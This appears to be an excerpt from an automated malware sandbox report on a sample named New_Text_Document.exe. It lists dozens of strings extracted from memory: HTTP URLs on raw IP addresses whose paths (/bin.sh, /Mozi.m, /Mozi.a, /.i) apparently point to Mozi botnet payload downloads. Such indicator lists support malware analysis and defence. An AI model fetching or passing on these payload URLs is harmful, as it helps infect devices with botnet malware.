                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.142.250.38:17945/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.147.226.138:32804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.147.234.54:3487/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.147.74.16:65338/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.148.185.149:54273/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.148.237.205:7686/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.149.48.21:63946/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.151.57.214:17299/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.152.141.186:40603/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.152.84.56:52066/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.153.244.75:29670/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.154.226.39:21507/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.155.59.101:48797/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.161.35.243:18050/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.167.152.115:36966/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.170.68.84:54553/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.179.124.109:17176/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.180.79.175:48899/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.181.143.25:31353/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.181.33.227:3866/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.186.25.118:25680/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.186.84.159:42520/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.188.52.215:48804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.190.138.128:59828/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.224.92.205:46569/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.254.113.14:31892/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.100.175.200:27429/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.100.234.101:33463/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.99.49.168:19996/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.0.218.245:34758/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.0.226.180:27680/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.0.240.58:63754/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.11.242.36:51803/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.11.242.36:51803/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.124.238:39195/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.124.244:26258/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.151.230:22306/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.182.187:42994/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.19.248:44691/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.19.248:44691/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.19.248:44691/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.199.57:48421/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.204.243:27788/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.192.64.87:65009/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.235.37:49320/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.32.140:3375/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.35.146:1261/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.53.150:50205/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.60.238:52754/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.194.96.78:41616/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.134.206:45337/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.161.7:42388/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.172.171:14352/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.197.10:7063/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.86.169:48016/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.195.98.210:59152/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.204.230.146:6173/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.205.174.78:47581/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.103.124:10769/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.103.89:55262/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.143.236:33534/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.181.57:37716/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.20.187:17629/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.203.42:48600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.227.189:37639/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.246.124:30242/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.59.59:15213/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.7.168:45591/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.7.168:45591/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.7.168:45591/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.7.168:45591/mozi.a
